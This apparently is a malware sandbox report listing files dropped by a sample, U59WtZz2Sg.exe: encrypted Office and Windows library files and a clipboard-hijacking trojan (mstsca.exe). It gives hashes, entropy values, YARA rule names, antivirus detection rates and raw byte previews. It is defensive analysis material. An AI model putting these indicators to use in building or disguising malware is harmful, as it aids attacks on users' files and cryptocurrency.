Preview:	<?xml.....Bl..n..\....).$#..Z.oM......v......c..ws.{AhO..7<].........V.>j5q..u.!.W.[.gf..J..=......S.q/).".....e)%.W_.r(..s.c.xs..[W........KIq..x2..,...4.+...c...VRz..$..s.=..i.(.d...>K..j...Z.as.]/.u.J..b3...0.p....)."w!.B...A.T...h].Qj.uE........G....B]`.1..g..3......:\h7y...>..j.tr.r#?G5.. \|fY.. I..n..x..I.I..XW0M.p^......b.D...K.... ..6......:@.n.6.X...f...t>NU...F.6..........f.f..ke+.@x.....(71.3BE...Q...p...`I.5..!.PA\..Xqz,...?./h..#R.....A...Z...f..>]..m.......S....H.....TI..o.9..].t2.......%.<!....V.!..k._,..Aq.Q.7.......N...^.#.U..2...s.sp..0R.V..C.......:Q...........M............4.........#..4v...L..;i....Lcr.f.}...W.\.......!......j.1.._...g.S.!j+P....V.g.oZ...=.p..u...EPb.=\P........z......5I..RKB.B..&.C.8.m .B..f\|nw..05t.W....0_..V..6g..M.k...`...0@$......dc.4.{+...j.[.;Im.".....!.....a.Uc!.h.........1{Jbj3..J.(....`....>#.. .n."z.\......=.H..y.......u.:~....ka..l.....^.Ws.JjB#.;s..C.1.;.+..:6.........B.2...4...o./*M.,

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	255553
Entropy (8bit):	7.397358409432278
Encrypted:	false
SSDEEP:	6144:Edzr8FSqI3N2Vt5xGusR0BenzoAoeCLZXUKXO8hXUL+XxqXr8QLFXMsqj7s5DDME:If8FSqI92f5xGsBkkcZ
MD5:	5DF3AFD88D8A851F4FC59263224DDC75
SHA1:	705A395244AFA41FF406C5AAD3BFA3D3C6A33983
SHA-256:	6FF4E441C93EDE6225743D76C3426675D871EAC888E93576CBBEDF6103E8B8E1
SHA-512:	DA842EC3B2E1B13FC75F5A50A1AAB6D9C5AB014D91B5FD6A4493E0FC5C14E95D5DD93B435487994A83BC8AEA9F7D8D629B65F4CD599E7BC8D554411A78896DA8
Malicious:	false
Reputation:	unknown
Preview:	<?xmlqG......2..Y%..5`I.Z#.;...)..HMnP.[#[[...hJ.]..3S...a$....x..V..-...t....?..l..#...c....!L.%O.z..`R...........G...6aw.4.....\|Q6.._......O..\|p..N..8..1.J.4!..!..x..t2...4)...0V.=:........y{.er.. K..>.s.P.$.:.......(,.Do:..do.I...\...$om.=S.3#.}P..u....H..m..]...wb`D.2.\|...8dJ.4B......Q5.1z....?..L....b.....-...~....G0C-K.....nP..E.3.6.......jz...&...\|.tu......(...A)X..... :k..F... j~..._^c/y.........R,$F+={-.H.../...3O2U..o.I.F.NU.a..t?..h4...'.....R_..i....A..!.........G"......... 3.<.kw...GFiR.....^..jt<`pvt.....oM.$w,..L....d].t.......Am.-B./(j9]E}$.y..B;.....{. ..`'D.c......v.b..Y.<..5.T7.......b..;v.L.7.w.....(.....).h...a...'.....b..X;........8.J.D...l...6...T).~...6....w...'.K.p....J..!...!0,?...-..K..){..jOv;.....y.......^.........<...W.[b.%S..0tu...{..0a.2.,R#Wx..W.....L.p......O....l"j.j...F.w...N.....2x....0..A.G,...__`n.y..n...J...e..bkg...lA.g....+..T/.N....?.....?..\|...{8.[...4%c......j\....?.Q.dgj....O......9f....,.....

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	251670
Entropy (8bit):	7.427810140413259
Encrypted:	false
SSDEEP:	6144:RTqY5ydCRWQ7dwEpOtNmJ/OZKXMUw3iOMJfot1FyJS0fm2PgYuSR3Q5ntOdE4Cx6:RqY5DYkdwEwSJ/O4
MD5:	AE0BBB59C8FACA271B260BFFF7850726
SHA1:	2E516552DD18F1AAF9C12486E0D4273335E89325
SHA-256:	B71E362098371FF63CA9F211963CEE249361CC95F855890C37773DED4DB3E94F
SHA-512:	D917B80A5DB2323EED357EE3E7BEF7D1322D86B118177389961F1A2B2E7D6F7C85348FC657787FB8B518591A3FAD734505DC28A060D7F9607FCA15E43864F24A
Malicious:	false
Reputation:	unknown
Preview:	<?xml.....]@...d..a..o.QK../.VX...!...Aa..Tb[=$YNg.d.j...[0W....c.<s..q\.......3.....0..h........8....OP.......18.5..M.#...>Bl..CP.@.f%._0_......~LX2]..8O.r..H..L.p..3y......y4`..6..+.M......8G..$:.B.....d.?....x.gZ.2.X.C.j....=.^...x.G.ro.CE.]1.U'.4.).t...g..6\5._5.rP.... w..-h.~h...:..D.2.ic.$....$ZOQ./;.\I....m5..>......>1.Q%Uo...\......y&SD..g!.u.L..Z..>..c....F...\..mQ........~..XkJz.......u.'..;..(.k."Y...-...iA.....d#......;s........'..^.8.r3{wLW...CA.....d.qc.{~.0.....".+O.Bv....h..U....2....7.i.2......9g2.H.........?0....M.~..e}...}...;..+...w.D..R.?G.W..:\|...%...r\|..ZMv. ..#.8.d....Sk...K..:.(.W.~...../......>.`.`... ..G...Z.e...}.>_..\|.h..8M...`.........."..........2C.h\h...x..%`RW...Dl4...RwY...X..8.s=...T.{.Ho..=Y.\|.Q.........;.=..V.6..$Fu.$.Q.yb......`#...`....i.S...T...5&..Qg9.u,@.~..}.m6.^Yat0N..+....l.1.,.......J..X..E;....D.oI.-.u4..&~3....;-.. ...j.MI2..9.......M.....[...z.....1J.....l%....M$..>.Ib...zP.7....9..s..

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	344996
Entropy (8bit):	6.9310676911292655
Encrypted:	false
SSDEEP:	6144:4EgPbA0VLLoN/ERSCN+InEMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iy:4PLGrCFb
MD5:	D69F78DE52705A6B965B28B66852DBB8
SHA1:	C249C0A4CE972CF3720C2725F39BC96E522F69E1
SHA-256:	942C071B2A6A9A47E06AE3E4EB31DD753EC28327B9E4258B7F640F3769B4E4C9
SHA-512:	94BBD0C54B5D68440C6760FD00916DE45D20D16B019425B131873F69B55779FD4FCDAD1D3611068A7DCD25553BAED5FD27ABB6B2FE03F214FE0D5A6848329876
Malicious:	false
Reputation:	unknown
Preview:	<?xmlePgM......0X.Nc...n...Y.2...>..........J...^..z...].B..}..c.u...3x.0/l.HG....BX..wA..FT..3....}.D.y.T&.:!3..GMrYu...<.(.4.~.....S.V.cn.......'.Y4n...s.fj.j.$/.~+..,[....p........"$l.f.?.r.\|w..S.P...G.E.+H1.......~.$.S..IFt.j..sG...1.6...?X.....N)gLD....^K...z..L...s._.K....JO...q......... ~....X....../.+.^...(..5........m.u....G..W....% ....L....c........$}T...W..3.5U.`..{...VK..dEG..&.....Q.....RV..4zM..H.u.k..N..<.\!O/.2.).....i.c. .........J...O.... .].<&.....'.2.{..1.?M..>w..T."...q..-....z.H,....g..C...........U3.C.-A(...4f..._...O...V=.~8W.D8[y.X.d6[ms.....7..p ...._....K.q}rY.......wF..."&>....C..Y.....p....u.P..4....l?.I..^O[.U..n......z..&L.!..e.._:$3..I..`g~K.t@.....l..7O../.9d9.YMST;:`9o-..K]1d.x.Gb.4...!.x........(..(M....^..oB.@?...J...'a.H.s3pxg....w.G.w....2Zw#..H..rRy.{..:.5.^...........b..51....7.Vj...g#b.&M.}uZk.['Y].Q13#~..e....X.U.M .C........{.q.7.p.;..V.`ID...{6w.u..0..L...U.....%~<uvS.S..N...Ub...a...h.!.

C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=[0xffffd045]
Category:	dropped
Size (bytes):	3706389
Entropy (8bit):	7.9400592308972655
Encrypted:	false
SSDEEP:	98304:MR9Na7kNEeEukdHe3mBQlqZ7kNEeEukdHe3mBQlqgNsf8P854annqjGaGahPr:0K7kHbkdHe3p+7kHbkdHe3pDsEPuDn9a
MD5:	BF50B79DEF69C49FADA5E96291F1C04C
SHA1:	3A0DD72FA5E701160CC2625827AC6B6AAB57C5A1
SHA-256:	485D09C28B86293644BBE9DC2929368F3255DBB895809619C7C3A5C15CEEDC63
SHA-512:	974AF7E12E545D54033EE0683800EC2AF2D3A7066ECBB242DCC19FAC2A8425ED1AEE276EB3741A6434D900FF78D59C3B6BBB13CBB8DB296DFD8DACB08127E703
Malicious:	false
Reputation:	unknown
Preview:	PK.....E.h2..q.i.`...o..>...O..`..kB.u..H.B.....+NZ..gV..."Y.i.....FS=.0..).#..`#.Da..H(..=.V...uS.]X7."Y<.+......j..5;[h.p......`.Y.....8..I...9TIbdw...nF..Ba.u...I....+.UP....s.=l..\..b.:..K.....#/].{.}'Q...$3X.k.i...F.Z[v[..r.d...~....1...\|...-.....S..M..R.a.hh........Od.z.@..~..v.".../py<t...Y.!P..%...2S.\|Hq5w."T.N.K..:>.D?...=.5g.47.......0......L..=$R...._...J.......T_3=.ai..'h^.^#&.A..C33O6l... >.Q../....t...e....Rg....p7}MO.[.......`.8I.\|.....pa1.?7`..=}.CA......P..J.....s<{.....Q...:..7PM...".....;.%a.m2.H.{.11..F;.S.0.....2[..v.0.g.7d..h..O..-. .5a.ki.D...S.s..H.....%.....>5.a ..b...W.c......n.>...I.w.......Z>...P`...-)...>Z,..Xm..8g.g.Q..j.}...]%k=..Eu.<.+.M...lL@.R.W. ..AT..D.D.U./...7?..,..<.1..qWZ..a.WL9$..^e...a.s..9..k..3....mZ.j...4....z........`..U.......b"q.......A..U...Pp ...G..\|.S.8V.../1...xy.6l...7....=AVu&c.T..VX...[......?...A.T B..k...........9a...O........BQS1..d.&.(....vNq...?...Of.Umn...Es."...Wk....+....

C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Download File

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.3362059272001
Encrypted:	false
SSDEEP:	192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
MD5:	9EAD10C08E72AE41921191F8DB39BC16
SHA1:	ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
SHA-256:	8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
SHA-512:	AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	38064
Entropy (8bit):	7.995665653738566
Encrypted:	true
SSDEEP:	768:jnuA3TonMO1AfS/VzaXHdNFXcU3nJ9ZsW2+kEczsqcrmdn1yujS5xMVoK:juKMMhK/VKzFXcAr2+YAqcUor5OR
MD5:	E543FBA6F23341D10352247279AA6899
SHA1:	5CE2417E27A5B950FC0E00B7DB641CB92E1F76A4
SHA-256:	57322565444970CACB94B3BAD735D66015B67D7758B9C75F6815B7007C94D413
SHA-512:	487CCF267BE711930C66C069BE6CC04D39C85C0A0049876DF831CD13BE1C6DE8D1A3031F2C7EAA297D7B1341FA29AFFFA9D487354428BB1F25419C1A111213C2
Malicious:	true
Reputation:	unknown
Preview:	...........x.............L../J............@.9.0....io.g.5(..J.3...7.C.:.......P.=..s.^...8EW~>..2@._..b..D3\ ,.......@6x.s1...k.WZ.W......I..j.....t&..A..["a>%.C.$.:..Z.fU..8=(\JwD.C....r.h..O.....\...>~.."..7V.._...\.Z..r.........K.l.G....D0..j.Cg:,.D..llL..&..1......K...'..".].q..>b?.E_.m.c>.6.....'>..x.\...5...{.>A"3..Pi.@....XE..K.y/]a8.9...By.l...M ....m.bJ$E}..?..... $.k.S..;s.hLJ .E.Z7.^Kpj.]z..p.....g.J....-.....xRsn..V...X.....oU..../......w!......Q&.i..E.].<...z.........b.v.D...NC.....W.6Z..y.FY.4.u.X.#.#.&#r.VM3.\.}.Bv......m;.(...>..&..j.9..B..p.....b..8.....z}.j.E........r.D5d+.-.%.L...".9.T..i.....B...".)N....3z7.B..TK....Q.F..Z..OI".-)........%P-K.[.S......s.B_...G'.\.]o.v..}..r.6j..q(4.n@s\|..&....Flj.D.h..~t....6 9...m...;....~.#.r....6tU..[m...........w..dPL...p...s...0a.(..b.GH)..h.&.^..=..5..[:.....?.q..:...8^....>.....:.(.vM.\[..9md...c!.f6....=........0..S..l..E8..d...)..>...Le..........H.L..z..H...S..xg.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1503
Entropy (8bit):	7.873416935732594
Encrypted:	false
SSDEEP:	24:SJ0OE9DeJg0+8LYgEyxRop2T7MjuVFG9ELhWebRYHvyY4WVtJ5V0bD:S2OE9kg0biyxRG2XMjuVsIEe4vT4WVtI
MD5:	A85F77BA45A2A3951751A2076188C501
SHA1:	7D3AB2AFC633EF3CAC9717978C10EF6FD3742DD1
SHA-256:	D565822971152F6CEE45F51011BF661D91ABC79EA22AB69ED0BD12DB07675CE9
SHA-512:	A4EE5AD975406DC2F311A08BAF1917D201A6DD991E5A21BE077369E3425CDF363B43114B32688A12D7FEECC7D01E1A69BE092030E7EA0038F609DF81C56E4767
Malicious:	false
Reputation:	unknown
Preview:	L.....@.K...../ ......JZ1.{........c...0UE.....B.L .9....t....0...'a...L....g....w.R.{.Lry.2.L..+..m.O..+p..i..B.......5........4Q.<?.<.Y...4.+......2.oY.l9\)xh.%.].4P...;.m_.8.....t.h...Y...~8.u.y&Y.D.{..V%^.zl.w..-8...e..1...?..Z1z..D..k-..[/b.^..L>.I..n'.<......3.e....R}.....a+.R.BW.g<wN...g.$........?B....,...(Oqh.f.k...^.(.)U...3..xOW....~.T;1.G.........5.....nYy....x...0.i.{0W...J....]v.yP.Y.._....l..^.l.L.H.%..\...>.Ck.l.....%f.c.....kmsKb$g..$.gI...7..1.%...;..y.m...v.\|V......T#..y...em9@..2..4[.."..Y./........<[.C!.].W.j(w.t...........*.J.._.z...._l(...E.....;J"....O....<...E.0...$.L...su..H.V...}!4..C.p..@'.......D....(.U...K<..oO..;..>._.&.P..$.....dI>...o.....0...f..9..,w......U...J.HK%"&yW.=M...y.m/.......Wc...tq.A......>OG3...-....>^.....tL.B.@.5..<(...U..@iz..^4r..Mz>~u....zoo..."p.'.F.C...._...........?7...AfJ...~c,1./7=.]..}c..n0"{..".6...R...e.H..I.Q...k....E...SO.G\|"N....5J1.E....=;X.e.C......9u.[.g[..T..%..K,t.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	362
Entropy (8bit):	7.290227327843469
Encrypted:	false
SSDEEP:	6:bw0uMongUgG8PH63fTaEZYMZyQwxsVlYbs2dr7CtDgWkK1TJiNCUzGxntHcii96Z:bwN13gZPHfwYxGlWXdu8GNwctcii9a
MD5:	7EB392F2624CBD3841C0E975056C385E
SHA1:	26FD68690F2DC18C9C76F9EFC38122C98491567C
SHA-256:	8E7E27F0D74F5597AE3CF57D248140B453DEBD84A34E31081E7BFBAC93D47E67
SHA-512:	9040A07A2054F2F513F721DCD4D463ED053488BAFA7BE0247779948A45AF477EBD8CFF59C1EDF0A367AD7202E9D420756C393F0E9CB2266D6F0EE9183FE291D6
Malicious:	false
Reputation:	unknown
Preview:	[fold.......-..G..>L....h3.......!m.M..$..E..p;w\|...8..x\..6;..*.C#0...P.rj.]...0........p..Q.P].i:R.xO1........Z\|.6.G~B..2].bC.s...lv..B.....W.98F).........+H+.<.I..~@-%~....Xu[.V..>..4,g........H.uY.../y.e...S.....<..F. I..@.Q....}.E. y.T.5/g..Q....>..w..n...../K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18276
Entropy (8bit):	7.989215594130742
Encrypted:	false
SSDEEP:	384:2lu5SbQKz3QO8cX0QU0/gToo08XszQB7gbDCmcto:n5SbQWQO8kE0oToo5XssB4DCmcto
MD5:	168BF36A663C501BA2D62A2A0D41D521
SHA1:	D11BB727F915D870DD3622E97E3E88F42205399F
SHA-256:	69B6931FB4E2EE584D0AD9F28248CE0BDE0A542F2997CBF7097C52620B56A169
SHA-512:	80355C93229A98D1B407D969BF74A554FD16F38DA13E58C2E4A94778A09D4A7A6F51924D6D31569BA9B4F8BCCFF3DE6740C99F1C616C92DD5B4A2B4AA06CF7F4
Malicious:	false
Reputation:	unknown
Preview:	PK...........6.e.u....d....N_........R.#.j.&..j....x....\|1...0...\|...AB...{.UZ....V..)....9...+f(.F..]A...g.xU\|K..1...K+._\)zj....e-...C?..^#.....!.TP...i.=w...=.@.+...5u..c..l.E.w..uRYrN.Z.~../ v.x.......W}0.(......ae. .9B.9......CQ...B.7..p...~ ..XC....0.a..L.....-...NX.t+u......1...e2.Js.f#4tbN..........\.%a.6...<..oR.}[^P.3.@.T...#...k.%[\|...u.&.a..O...qn.qa\|...Sa.c".V....7....Q..B.tF6..!.W..%...Y.7.........:6-...1._&.Q...,..=...{^#C2...,VK.F..e..K.6..D...I.....GE.@....k..[>L..q.....3...P^.L[.Z.7#.....G.A.%..<..../...~eK.}......p.....>........&Gs..OB2,Vd.....f..m..0.i......f..4~/3.85.b.vo.@GT....q.g...d...+.p.v6.p..[...?\|.s...^K.M..Q....O....n...m/.)~.....#.......0(?s...!ts.g...m..j..xg"....%..5ny.......E.V........(.RnB.y.~65#..{.G"..Z....o......_..94[..SF{.....f....&m-c.cAw&O.=.5%..V.-4I...}y.nn......8....Ck........AKp..c.(..@Y...^.p0...........2.ef..m...^..o0.>.....T.l..n..9...u.o;-y.:.E.!W[z.{..S[.j.Fqp.,.p;... .,.hefL...1D.AuQ.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1352
Entropy (8bit):	7.855441450104035
Encrypted:	false
SSDEEP:	24:YyONBWRgqOWvrIqvB2Rn8gKImf4gBeRrCYagDOf33oIK+ubD:hO2ChWvEqvuXmAGeRmYaYOfngD
MD5:	5C6A70538759F31004BA8448E952B722
SHA1:	906BDE064C2A285A5B301BF3083405FFFEC0C390
SHA-256:	612636BCFF137CD637B98728A7BB1B1961B5679CD954CEF686EEF5A7B89B33C3
SHA-512:	82021010DF34676C784AB9603C7F22AEF2E7B2AF9AE2453EAD788DCA8244E8F0806CC62DD10F7DAE2E5A74044AF41CF20BA7C0C47BC8C78CCC93A96E3E557187
Malicious:	false
Reputation:	unknown
Preview:	<?xmlt"..86.._..:..U.O..Uy6.VDD..:..sf02(........,HGq..UAe}M2..W.}...8wS..av.v..^.\5P.p..{m>........sp....3WB...v#$....AV._.j....u....$.Eq...H.@.........J.EZ...~.Mr9E...r..2.`,........VD...N..+...~...\.!.`....OZK.}b...C..S4..l[..z.y.../..&......9......$.xa...F...&.o/NM.Rb)...E1.....o;k...\|...U..\....c.v.-......@MS..9.......SU...B.].]..??...,....j..M..3......3[.V....n..2Y?(.FRa.S]}..=.C....".n.Y......`$..].2.\>.,F=.}...'...#..=~../\..~....N...-.[..?....@.../..I.?.O0.C\J..!.....N..4.X,q.]........"..M......e..k.Fvc.A.C...!.>..^n.&\..btH\|..W..<.G...zt+..IK.>...(I`o.?.(...lm.....ggg.-.r/.D.,..p....9$F.!U.\.4...">.W\|.....+.)R3.C.$..z...5m.Y.......c....%k...H.....4......6{W_...._..1q.<..{=..f..3....!^..b.[....`.w...v.. .[.\|J;.g..h...m.JL.......H.T.2'Z.....=.T..v..O3.....S.....)\|.....k\.x...M .....!7XMc..I...x.v_...a..>J.......ql.K{/...Q..t...2J}YY..../.c...A.E..25;a.~.O.....A.i1.;./..z.....U.\.1P.D.Q.d..X..j..)-.....+L...W.....17.mQ.S.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2430
Entropy (8bit):	7.917602733050563
Encrypted:	false
SSDEEP:	48:o7zFqLOgU6KgAT1RqU00+L67MI/v+atztpbH2jinxdJgYuD:o7zFvb6KZT21Tat3bHVnxdOYW
MD5:	758ACA7D71AA6B06429CFB3C70837275
SHA1:	F75C27934EA95D34242C88B69F313E12C45F7BD8
SHA-256:	0989D716A5E30E8E35B2948195C276F0C012545DFC22AAA5B0A18B4A31A746B0
SHA-512:	04F0D9A97F0291004CBD5AD1F1C64300962CE333A724AB4B6A868A5BB883161D6F18257D67BF394D3A83C3EE66FB936FCA7F930C46872685050B84C30C21A37C
Malicious:	false
Reputation:	unknown
Preview:	<?xml.Qf..<P.........@.SH..;%..f.@+...XA..D69...ly..g..nqF...y..%.~...9.."I'..B~OH.........J..t.4Fh..3.:.p....l.m../.....:....M.6.&.m..~S.A...g.u.6.Y.....3F.w...e.....EV.!..8.{...{2.I..H......?G......C.G.b.f..,...Q.a.a.'...P..E..m.....+$.....q.z.?N....Wr....sI...$~.....!4.._s..~[.F._........_.!.. T!......X.p..rx1S.!.......(.T..~.R%.1......K...o....n.G..Y........&\|...d..n.............!6..9......)(..`.VCD.oAzF...IW..!S..g./...y.4......9..].B..AY<u.QD,..=.%\|....VX....7;...........nX..!.uL..F..,..kl....2.K..]...(.r_......h....;.......p=.C.'3..n.l...%..,...W.p.(..{.f.r#q......_...S...I.Y..i.....Lw..?..@.6%1.\..@.de.........2\.....FH...o.....5j...>.u.'N0....u&..O..H\|/.#.{..2.......\|/.....:._...L7.U?......C@...J........~.)(..R...=U..-.D.....M...z.L...[...mV#..\|.@ R.e...~6Gf7[..q~....jV.^Y{.$.=:...2N.ELpv....a.'..G.j....W....BS_.pF.......Z.....N....F+...F<\|..+..N(......<..b..7.<..]...n@t......^.pW~..vX\|.U...=g.4I...3~;Al..R.}...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2388
Entropy (8bit):	7.932155225210476
Encrypted:	false
SSDEEP:	48:CvO1GuxuhxNe9lnebWlK9cIaERf3NQgkHDP5i/jG/s0dTjS5L8RiSM7AcMD:51V91QGKiI5+HDxYSTTj8Ly4no
MD5:	A2D3F08A9B30A8F70AFA639A02D94A19
SHA1:	9A6ABD60204ED55098AD40D62043504426D83C14
SHA-256:	4AA9E9A99372D4A35C3BC4A079A5EF2F1E86BD7A1424A03F20E120B9E8045DE3
SHA-512:	2CD2F4F3FF66DA64FAA40076850C82E8879A65BEADFB725F15298F28DC03E436FB2CDF2FDDD12826081A306D87405B879DE35512A41E9BC8EE274486974F3132
Malicious:	false
Reputation:	unknown
Preview:	<?xml..+.=H......1....fA...g)Q..d.T.5..F..^. ...\|.Tw..S'..4............._..OX...jU!..u...pu....u.H/........V.W.q.0...8.KYf.pF..?.S.R..I.Q\...<.}..hl...l....aV'@w...}......u..0.T...:.V;M...c-.;L,8A..t.Q.}.%.u..K..#,.u[R..{..}G.x;!..'...[.P.e.z..X..Y..k....... ..RV.]:lj%...L............U.y......x.:...:T...6.....ef..[c.b.>..m.xz..B....o.4..<o.\.^K.....*qg.g....C>B...n.j..W.g%..Y.....0.D=}...&.N.9#..X.....-f......(.-...'.c.z(..w.#....;....I:[.qd.....)....7:...`.I.r.~O/.O$....'...+{..h?/eN..U...S..B.k...E...9....DT.!Ku-O....55ba..,...[w......}.(.KU.$......%hw%.b.9.#r.._...3.........xJm.>..Y.Q..H5 .....G..0..#j...&PhMB......A2Z...:~\|...y...#.,.A.AJ..NG.iAon.w....&O..8.7..&....3.i....I../..A7..9/..!w........u.55..)y.?.<....,U.......aS.t....f.~.NV<.<y.G"...8.7...W.;0tIn. .`......k..I.B.......9.uX.u..P..N.e._r..0..BA]..p$B.@~..%.+...0.$.C....G..6fB.g0.~.M4...}..I.;v........s..pa....f..?.$!..1.S.%a.Pl...V..YN...w{.0.I\|..N~.........E

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2405
Entropy (8bit):	7.916132902903134
Encrypted:	false
SSDEEP:	48:37GMvB4Kct76YIM2ytVga7fAbTRBcTi1/i4pknuQzZ6BnAtyyEx/RxFpMvlRjD:L7ct76la7YbTRBPqs+b14HBBFpMvlB
MD5:	FA516B336B94E17440AA2AD047F1A7E8
SHA1:	8288689343E75BA4FCA78D41346F276EBFCD96B8
SHA-256:	169AC050B9D0C429F976395EC084DC8D0BF6EC6FCC0A657EB4C7ABA5F208A5EA
SHA-512:	81F890E22F38900F4491741BA00FF56D38E1B9DCAD05E496EF1BC2BD24A6B7B1F763B59CDF93F7D58E18940E5727C3E1015958361691C5CDC6E828D26AD09F80
Malicious:	false
Reputation:	unknown
Preview:	<?xmlL....Z.;...<.jQ..1y..t....).W..R..[>-S..6..3N...y...,$.n..MI.<t.8EXt.....kbw>.#T.H.<...r...![...C..f..&.C..6..pR.=...vqxju6S.vu......$.....c.i;oT......J..8,.......n.;s.V[..4..[;M........h..a...$...gt.YiU................gS.]...!L@r.H.....IO...l...f......U..z$Z5yo......Q.N.ER.'..x..N....A...f..S.9.X..U'1ri0..Mz...H.f5.W.'$.v.....y....TF.....,{..K...>%0/...\p%.p..k...o.....9J%..H.....=\|7.V..s.c.4.a.5.y..]..t.j......N...t._q...$._.\R.m>....Q.w.S.m.7."z...-.c...Uv....L..9D.s..).v...B..0.....<H...!.93.....T4...5...:o...P.................3.#........H....z.E\..m.....\|'.'.....0e.,r.Wm....../.<.~.&.;..o......>.;.Q6.....T......I.x.@.....W;D.jH...oQ...............'..T....z.yG..L.2.Ye.'.:.e.BDH.eh..............[.@P.p....+..7..jA.......c....f7..X.W..=.P.gf....{.....W.s:....2..3...e.o4.%xy0C.8..dF.....`..G.;EHDFu......E..w..2wc..aSC..t.5>.......3.G.Cg..S.MWi@.(..._]Y...h,...xu.<..x....0..7.....P.]%.RI,.O...jQ.Z*.t>U./ .G..6a.P.....@.\i..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2416
Entropy (8bit):	7.917945483835746
Encrypted:	false
SSDEEP:	48:rWQLz8qpQl78W0Ksz5jN/CvyAyIq58dFQTPBSQo3Bj82I+3GkhfHJD:rFg4QlgW0dFRCaHIqAFZQo3Bj8t+WQPh
MD5:	E0E7A3363297716C4265EA6F608ABA7C
SHA1:	72070888AF0BB75A9C514CD544B959D76B84EF80
SHA-256:	5E2F66C927B5462F1851D0BE45A6D3E541D60D05FFC8B85FF21A60067D22F256
SHA-512:	13302B255746BA81E81B237CBAB10325871CA4A3A19561CD39F6F6CD4526FF5FB1133E64EA50F36986DE50262F0A31D050FD9CAF040A351A8358C6E5456969D7
Malicious:	false
Reputation:	unknown
